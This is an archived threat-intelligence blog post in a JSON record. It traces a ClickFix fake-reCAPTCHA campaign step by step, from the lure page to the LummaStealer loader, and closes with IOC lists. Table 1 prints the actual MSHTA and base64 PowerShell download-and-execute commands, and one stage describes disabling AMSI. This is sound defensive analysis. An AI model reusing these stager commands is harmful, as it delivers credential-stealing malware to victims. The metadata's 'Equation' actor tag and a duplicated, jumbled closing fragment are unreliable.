{
	"id": "695a6666-f9af-4df0-9d8f-10f542716564",
	"created_at": "2026-04-06T00:21:06.251401Z",
	"updated_at": "2026-04-10T03:22:49.928384Z",
	"deleted_at": null,
	"sha1_hash": "6aa6dc25b52c124c06919debc8a88ce9d07e9cdf",
	"title": "One ClickFix and LummaStealer reCAPTCHA’s Our Attention - Part 1",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1684489,
	"plain_text": "One ClickFix and LummaStealer reCAPTCHA’s Our Attention - Part 1\r\nBy Binary Analysis\r\nPublished: 2025-01-30 · Archived: 2026-04-05 16:48:01 UTC\r\nExecutive Summary\r\nThroughout 2024, RevEng.AI has been actively monitoring LummaStealer as part of its mission to uncover and analyse\r\nemerging threats across the commodity malware landscape. In mid January 2025, we observed a LummaStealer campaign\r\nbeing distributed via ClickFix - in the form of fake reCAPTCHA pages. RevEng.AI has further examined and documented\r\nthe delivery chain of LummaStealer in an effort to uncover whether the final payloads have also been subject to alterations\r\nin an effort by actors to aid the compromise of victim devices.\r\nLummaStealer (a.k.a. Lumma, LummaC2 Stealer) is malware that focuses on extracting sensitive data like passwords and\r\ncryptocurrency wallets from infected systems, often delivered through phishing campaigns - first observed in 2022 and\r\nthought to likely be a fork of MarsStealer. Throughout 2024, RevEng.AI monitored the ClickFix delivery mechanism used\r\nto distribute LummaStealer, first identified by ProofPoint in May 2024 [1]. ClickFix uses deceptive tactics, including\r\nphishing and fake reCAPTCHA pages from an open-source repository [2], to trick users into running commands.\r\nThis report will detail the initial stages of a ClickFix delivery chain: ClickFix pages masquerading as Google reCAPTCHA;\r\nthe MSHTA execution; several PowerShell stagers and in-turn a PE in the form of a .NET loader.\r\nIt Started with a Hash\r\nDuring 2024 and into 2025, RevEng.AI acquired and identified a number of LummaStealer samples in an effort to continue\r\nits mission to support the reverse-engineering and malware analysis community.\r\nFigure 1: RevEng.AI Dashboard for a LummaStealer sample.\r\nIn the latest sample (https://portal.reveng.ai/analyses/158599-8?analysis-id=146089), we have observed LummaStealer\r\ncontinue to alter its code base while maintaining its core malicious capabilities. While these changes may impact static rule-based approaches to identifying these malicious payloads such as YARA, the RevEng.AI Binary Analysis platform\r\nautomatically matched functions from variants of this malware based on our AI models' semantic understanding of the\r\nunderlying machine code. This approach, in turn, means that constant human maintenance of a YARA rule is not required\r\nand we can build AI rules for detecting malware families and their variants.\r\nhttps://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/\r\nPage 1 of 11\n\nFigure 2:Matching functions between LummaStealer samples based on their semantic behaviour.\r\nAs such, observation of an alternate delivery mechanism prompted further investigation and analysts were able to quickly\r\nidentify differences between previous samples using the function diff view.\r\nFigure 3: Diff view between matched functions in different samples of LummaStealer.\r\nIn the remainder of this post, we detail the stages needed unpack and examine this latest threat.\r\nStage 1 - ClickFix Delivery Page Masquerading as Google reCAPTCHA\r\nFigure 4: An example of a fake reCAPTCHA page used to spread Lumma.\r\nUsing a well-known captcha service likely leads the user to perceive the interaction as legitimate, building trust and\r\nreducing skepticism. By relying on a widely recognized service, attackers can exploit the user’s familiarity with the system,\r\nmaking them more likely to engage with the malicious site. The site then attempts to convince the victim to click a 'verify' or\r\nan ‘I’m not a robot’ button and also indicates that they need to manually paste the loaded payload into a run dialog box.\r\nIn most cases targeting Microsoft Windows observed by RevEng.AI, ClickFix attempts to lure unsuspecting victims into\r\ncopying malicious commands to their clipboard and executing them via PowerShell or MSHTA, making it a simple yet\r\nhighly effective way to propagate malware.\r\nhttps://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/\r\nPage 2 of 11\n\nUpon initial analysis, RevEng.AI identified numerous parallel campaigns being conducted by an unknown threat actor that\r\nwas consistent with the delivery chain detailed in this report. The base of the analysis for this ClickFix delivery-chain will\r\nbe: https[:]//googlsearchings[.]online/you-have-to-pass-this-step-2[.]html.\r\nFigure 5: Fake reCAPTCHA source code using the built-in MSHTA.\r\nThe fake reCAPTCHA page mimics real behavior and uses JavaScript to load MSHTA (Figure 5) [3], copying a command\r\nto the victim's clipboard to download and execute a malicious payload via a Windows LOTL executable, bypassing security\r\nmeasures and increasing delivery success.\r\nFigure 5 contains the malicious JavaScript content that was available on January 13, 2025, accessible via the URL\r\nhttps[:]//sharethewebs[.]click/riii2-b.accdb, which is hosted by Cloudflare (AS13335).\r\nAlthough not the primary focus of this report, it is worth mentioning that some delivery chains were observed using\r\nWindows PowerShell scripts (Figure 6) [4] instead of the focus of this analysis, MSHTA. The command is encoded within\r\nthe JavaScript in an attempt to evade detection, concealing the true intention of downloading and executing the next stage of\r\nthe attack chain: https[:]//amazon-ny-gifts[.]com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem[.]txt.\r\nFigure 6 contains the malicious JavaScript content that was available on January 21, 2025, accessible via the URLs\r\nhttps[:]//www[.]sis.houseforma[.]com[.]br and https[:]//horno-rafelet[.]es. This resulted in the loading of the PowerShell\r\ncommand shown in Table 1 to the victim's clipboard.\r\nFigure 6: Fake reCAPTCHA JavaScript source-code using PowerShell scripts.\r\nExecution\r\nType\r\nCommand\r\nMSHTA mshta https[:]//sharethewebs[.]click/riii2-b[.]accdb\r\nPowerShell\r\nPOWerShEll -W h \"\r\n[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS\r\n| iex\"\r\nTable 1. ClickFix MSHTA and PowerShell Execution Examples.\r\nStage 2 - ACCDB Content Executed By MSHTA\r\nFollowing the URL retrieved from the MSTHA argument in the previous stage, you will encounter a file with a size of\r\n954,627 bytes (932.25 KB) and a SHA-256 hash of\r\n179e242265226557187b41ff81b7d4eebbe0d5fe5ff4d6a9cfffe32c83934a46. The initial bytes correspond to an obfuscated\r\npayload, followed by some junk bytes that represent an ISO file, likely designed to mislead anti-virus scanning solutions.\r\nhttps://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/\r\nPage 3 of 11\n\nFigure 7: Obfuscated JavaScript content used in Stage 2.\r\nTo effectively proceed and comprehend the next stage, the initial large string must be deobfuscated by extracting every 2nd\r\ncharacter and skipping the next, continuing this pattern until the end of the ASCII string.\r\nThis transformation can be accomplished using a regular expression combined with common data manipulation tools or a\r\nPython script, as demonstrated in the example provided in Figure 8.\r\n Figure 8: Python function that reimplements Stage 2 deobfuscation routine.\r\nStage 3 - Resulting JavaScript Content\r\nStage 3 contains JavaScript, with the approach for deobfuscation similar to the previous stage (Stage 2). The content present\r\nin unCR requires to be isolated (variable names and size may vary in other campaigns, (SHA-256:\r\nf8cfc73614c279e143b97a0073048925ce8b224ee7ecc03e396d015151147693). Deobfuscation of this script results in the\r\nobfuscated JavaScript code in Figure 9.\r\nFigure 9: Resulting deobfuscated content from Figure 3, containing decoding routine for the next Stage.\r\nFigure 10 presents a Python script that reimplements the deobfuscation routine used by the JavaScript code. In this routine, a\r\nvariable holds the encoded data to be processed. A for loop iterates through this data, subtracting a specified number from\r\neach integer value, converting the resulting value into its corresponding character, and appending it to a final variable. This\r\nfinal variable ultimately holds the plaintext value required for the next step.\r\nhttps://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/\r\nPage 4 of 11\n\nFigure 10: Python reimplementation of PowerShell deobfuscation routine.\r\nStage 4 - Base64-encoded PowerShell Content\r\nThe -Enc parameter in the Windows PowerShell command (SHA-256:\r\nbea8b8deafad49b4760f6caa17aa8a9bd05786a57a9b6758c7c5d4342df3ebbc) clearly indicates the usage of base64.\r\nFigure 11: Revealed Windows PowerShell command after deobfuscation.\r\nAfter the base64-decoding is complete, it results in a PowerShell script with the SHA-256 hash of \r\n61a2424a8442751d9b9da3ff11cb82c5d2ba07a93ee66379db02d4a5cb24a67e. The obfuscated PowerShell script results in\r\nfurther obfuscated PowerShell, containing variables with very long names - a further barrier employed by the threat actor to\r\nincrease the difficulty of analysing the malicious code.\r\nFigure 12: The deobfuscated PowerShell content.\r\nFurther deobfuscation through variable renaming, and basic formatting, reveals the true intent of the code in Figure 13.\r\nFigure 13: Deobfuscated PowerShell script with variables renamed.\r\nTaking a closer look, unlike the previous stage, there is also a decompress using LZ77 on top of base64-encoded content.\r\nYou can write your script to do that or use a data manipulation suite such as CyberChef.\r\nhttps://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/\r\nPage 5 of 11\n\nFigure 14: Content after base64-decoding and decompression.\r\nAs shown in Figure 14 (SHA-256: 3739d6cc6eb06121e504eadffecf71568ddcedb98ee6bbbb75bd4b0244b4aec8), after\r\ndecoding the payload, further obfuscated PowerShell is revealed.\r\nStage 5 - Base64-Decoded, Decompressed PowerShell Content\r\nStage 5 focuses on downloading and executing the next stage of the delivery chain, allowing us to proceed further by\r\nreaching another payload at https[:]//h3.errantrefrainundocked[.]shop/riii2[.]aspx. \r\nEven though the URL points to what appears to be an aspx file with the size of 9636902 bytes (9.19MB) (SHA-256:\r\n6291ca6b9cf44bb7da8a2740cdf95aacb6eb1b2de32eece3073619a223970d 5e), the reality is that this file is actually a\r\nWindows PowerShell script. By doing so, the malware employs a technique aimed at bypassing solutions that are intended\r\nto block and filter the download of files with the correct PowerShell extension.\r\nHowever, to complicate the reverse engineering process, evade signatures and hinder detection by security tools, this script\r\nis significantly larger than the one from the previous stage, utilizing obfuscation techniques to increase stealth and delay\r\nanalysis.\r\nFigure 15: Content of the new payload.\r\nTo achieve a better understanding of the obfuscated content, the same approach used in Stage 4 can be used here,  in : simply\r\nrenaming the variables.\r\nAfter further analysis, it is observed that even post-renaming, it appears the code does not achieve anything noteworthy.\r\nHowever, upon closer inspection, some key findings detailed below were observed by RevEng.AI.\r\nA large variable containing the encoded content that will lead to the next step in the chain (Figure 16).\r\nFigure 16: A large payload containing the encoded data for the next stage.\r\nhttps://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/\r\nPage 6 of 11\n\nThe function responsible for decode the variable containing the next stage.\r\nFigure 17: the function designed to decode the large payload.\r\nThe seemingly useless code is not so useless after all; some of it consists of mathematical operations that will\r\nultimately form characters for a script to be used later in the code.\r\nFigure 18: Understanding the logic behind certain strings in the script.\r\nColor Variable Resulting Value\r\nGreen $HAUEqpTl 0\r\nYellow $RTqpgTcb 0\r\nBlue $rPLyMMsrI 955\r\nPurple $ltNlKCeAMFshR 0\r\nOrange $eTFxuXIA 0\r\nTable 2: Variables and their real values after processing.\r\nAnalyzing $tkMcVgT, the variable shown in Figure 18, all the variables inside it will be 0, except for $rPLyMMsrI, which\r\nwill be 955. By adding these values to the equation in $tkMcVgT, you will obtain 82. This value will then be used to derive\r\nthe corresponding ASCII character, which will be the character ‘R’.\r\nThis approach to building strings enables effective obfuscation of core elements and large code sections. This can be\r\nparticularly useful for stealthy lines, like the one in Figure 19, which targets the disabling of PowerShell's Antimalware Scan\r\nInterface (AMSI) protection.\r\nFigure 19: The first line represents the actual line in the file, followed by the intended content of each\r\nvariable.\r\nSince the main goal is to reach the next step, which can be achieved in several ways: extracting the XOR key and creating a\r\nscript to handle it, or even modifying the script to print the value returned by that function. Delete everything after the\r\nfunction definition, then add $data = fdsjnh; Write-Output $data; which will do exactly that, print the decoded content as\r\nneeded.\r\nhttps://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/\r\nPage 7 of 11\n\nStage 6 - Deobfuscated Powershell\r\nFigure 20: The beginning of the deobfuscated PowerShell script used in Stage 6.\r\nThe next stage consists primarily of additional PowerShell script (SHA-256:\r\n58b27398e324149925adfbab4daae1156e02fd3d8be8fb019bcdfa16881a76fe). However, it is not obfuscated and is much\r\nmore straightforward. The goal is to take the variable $a, decode it from Base64 (SHA 256:\r\n3d3e71be5f32b00c207e872443d5cdf19d3889f206b7d760e97f5adb42af96fb), and load it as an .NET assembly using Invoke.\r\nStage 7 - Obfuscated .NET Stager\r\nFigure 21: Decoded content of $a and the first binary file in the chain.\r\nUpon analyzing the first Portable Executable file (SHA-256:\r\n3d3e71be5f32b00c207e872443d5cdf19d3889f206b7d760e97f5adb42af96fb) with a size of 1,337,856 bytes (1.28MB),\r\nyou’ll come across an obfuscated .NET file. Despite the obfuscation, a closer look at the end of the main function reveals the\r\nprimary objective: loading a DLL.\r\nhttps://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/\r\nPage 8 of 11\n\nFigure 22: The final line of the function called in the main.\r\nStage 8 - Reactor Obfuscated .NET DLL\r\nFigure 23: .NET loaded DLL first bytes.\r\nThis DLL (SHA-256: f279ecf1bc5c1fae32b847589fe3ae721016bde10f87a38a45052defcf2a1c74) has a file size of\r\n1,185,280 bytes (1.13MB) and is also obfuscated, this time using .NET Reactor, which adds an additional layer of\r\ncomplexity, but can also be supported by several tools that properly handle Reactor’s approach. It includes several anti-analysis mechanisms, such as checks for debuggers, common sandbox DLLs, and environment variables, designed to\r\nprevent detection in controlled environments. Furthermore, it establishes a connection to the command-and-control server\r\nand ensures the loading of LummaStealer.\r\nConclusion\r\nIn summary, the process involves analyzing each stage of the chain, from decoding Base64-encoded payloads to handling\r\nPowerShell scripts. While some stages are obfuscated, others are more straightforward, allowing us to directly manipulate\r\nvariables for further decoding. By following this methodical approach, you are able to decode the content, load it as\r\nassembly, and progressively advance through the stages. This systematic breakdown is essential for understanding the\r\nunderlying mechanics of the chain and ultimately reaching the final objective.\r\nIn the next part of this series, we will explore how the Lumma malware continues to be loaded within the chain, as well as\r\nhow RevEng.AI can assist in both the analysis and identification of the given samples.\r\nHost IOCs\r\nIOC Description\r\n2b4ea59a346f5762e0e5731e0e736b08607e652424f49398ca4dfe593187565c\r\nContent from a file used in another\r\ncampaign, in Stage 2 (encoded\r\nJavascript downloaded by\r\nPowerShell), represented by its SHA-256 hash.\r\n61073b8eb7ed1a88cc86d62b86ec787b9213a802267d57f2812435f869095d5c\r\nContent from a file used in another\r\ncampaign, in Stage 3 (decoded\r\nJavaScript code), represented by its\r\nSHA-256 hash.\r\n20ed57745daf232cd3e136026bc5a8e73fdeac5f3d72fc7edad7747fc77e17e6 Content from a file used in another\r\ncampaign, in Stage 4 (encoded\r\nPowerShell script used to download\r\nhttps://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/\r\nPage 9 of 11\n\nIOC Description\r\nthe next step), represented by its SHA-256 hash.\r\n9cf251dfc34e6190eca9d114d30c1b34e03684a44b02ea384cb9e9270848c91b\r\nContent of the file in Stage 1 (HTML\r\nof the fake reCAPTCHA page) in a\r\nSHA-256 hash.\r\n179e242265226557187b41ff81b7d4eebbe0d5fe5ff4d6a9cfffe32c83934a46\r\nContent from a file used in the targeted\r\ncampaign, in Stage 2 (encoded\r\nJavaScript executed by MSHTA),\r\nrepresented by its SHA-256 hash.\r\nf8cfc73614c279e143b97a0073048925ce8b224ee7ecc03e396d015151147693\r\nContent from a file used in the targeted\r\ncampaign, in Stage 3 (decoded\r\nJavaScript code), represented by its\r\nSHA-256 hash.\r\nbea8b8deafad49b4760f6caa17aa8a9bd05786a57a9b6758c7c5d4342df3ebbc\r\nContent from a file used in the targeted\r\ncampaign, in Stage 4 (encoded\r\nPowerShell script used to download\r\nthe next step), represented by its SHA-256 hash.\r\n61a2424a8442751d9b9da3ff11cb82c5d2ba07a93ee66379db02d4a5cb24a67e\r\nContent of decoded PowerShell script\r\nin Stage 4 (used to load more encoded\r\nPowerShell), represented by its SHA-256 hash\r\n3739d6cc6eb06121e504eadffecf71568ddcedb98ee6bbbb75bd4b0244b4aec8\r\nContent of decoded PowerShell script\r\nin Stage 5 (used to download a file),\r\nrepresented by its SHA-256 hash\r\n6291ca6b9cf44bb7da8a2740cdf95aacb6eb1b2de32eece3073619a223970d5e\r\nContent from a file used in Stage 5\r\n(downloaded PowerShell script),\r\nrepresented by its SHA-256 hash.\r\n58b27398e324149925adfbab4daae1156e02fd3d8be8fb019bcdfa16881a76fe\r\nContent from a file used in Stage 6\r\n(decoded PowerShell command that\r\nloads Stage 7 PE file), represented by\r\nits SHA-256 hash.\r\n3d3e71be5f32b00c207e872443d5cdf19d3889f206b7d760e97f5adb42af96fb\r\nContent from a file used in Stage 7\r\n(.NET exe file that loads Stage’s 8\r\n.NET DLL file), represented by its\r\nSHA-256 hash.\r\nf279ecf1bc5c1fae32b847589fe3ae721016bde10f87a38a45052defcf2a1c74\r\nContent from a file used in Stage 8\r\n(.NET DLL loaded), represented by its\r\nSHA-256 hash.\r\nTable 3: Host IOCs.\r\nNetwork IOCs\r\nIOC Description\r\nbekind[.]ae\r\nDomain hosting content masquerading as\r\nGoogle reCAPTCHA.\r\ngooglsearchings[.]online\r\nDomain hosting content masquerading as\r\nGoogle reCAPTCHA.\r\ngooglsearchings[.]online/you-have-to-pass-this-step-2.html\r\nURL of phishing website with fake\r\nreCAPTCHA.\r\ngooglsearchings[.]online/riii2-b[.]accdb\r\nURL of phishing website with fake\r\nreCAPTCHA.\r\nhttps://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/\r\nPage 10 of 11\n\nIOC Description\r\nsharethewebs[.]click\r\nDomain hosting content masquerading as\r\nGoogle reCAPTCHA.\r\nsharethewebs[.]click/riii2-b[.]accdb\r\nEncoded, malicious JavaScript content\r\nexecuted by MSHTA.\r\namazon-ny-gifts[.]com\r\nDomain hosting content masquerading as\r\nGoogle reCAPTCHA.\r\namazon-ny-gifts[.]com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem[.]txtEncoded, malicious JavaScript content\r\nexecuted by PowerShell.\r\nwww[.]sis.houseforma[.]com[.]br\r\nDomain hosting content masquerading as\r\nGoogle reCAPTCHA.\r\nhorno-rafelet[.]es\r\nDomain hosting content masquerading as\r\nGoogle reCAPTCHA.\r\namazon-ny-gifts[.]com\r\nDomain hosting content masquerading as\r\nGoogle reCAPTCHA.\r\nh3.errantreinundocked[.]shop\r\nDomain hosting content masquerading as\r\nGoogle reCAPTCHA.\r\nu1.jumpcelibateencounter[.]shop\r\nDomain hosting content masquerading as\r\nGoogle reCAPTCHA.\r\nTable 4: Network IOCs.\r\n[1] As detailed in industry reporting, ClickFix has been used to deliver Latrodecus, NetSupportRAT, XWorm \u0026 BruteRatel\r\nC4 since at least March - https://www.proofpoint.com/uk/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape\r\n[2] John Hammond, recaptcha-phish - https://github.com/JohnHammond/recaptcha-phish\r\n[3] MITRE, System Binary Proxy Execution: Mshta -  https://attack.mitre.org/techniques/T1218/005/\r\n[4] MITRE, Command and Scripting Interpreter: PowerShell -  https://attack.mitre.org/techniques/T1059/001/\r\n[5] MITRE, Command and Scripting Interpreter: JavaScript -\r\nhttps://attack.mitre.org/techniques/T1059/007/\r\nSource: https://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/\r\nhttps://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/\r\nPage 11 of 11\n\nFigure 21: Decoded Upon analyzing the first content of $a and the Portable Executable file first binary file in the chain. (SHA-256:   \n3d3e71be5f32b00c207e872443d5cdf19d3889f206b7d760e97f5adb42af96fb)   with a size of 1,337,856 bytes (1.28MB),\nyou’ll come across an obfuscated .NET file. Despite the obfuscation, a closer look at the end of the main function reveals the\nprimary objective: loading a DLL.    \n  Page 8 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/"
	],
	"report_names": [
		"one-clickfix-and-lummastealer-recaptchas-our-attention-part-1"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434866,
	"ts_updated_at": 1775791369,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6aa6dc25b52c124c06919debc8a88ce9d07e9cdf.pdf",
		"text": "https://archive.orkl.eu/6aa6dc25b52c124c06919debc8a88ce9d07e9cdf.txt",
		"img": "https://archive.orkl.eu/6aa6dc25b52c124c06919debc8a88ce9d07e9cdf.jpg"
	}
}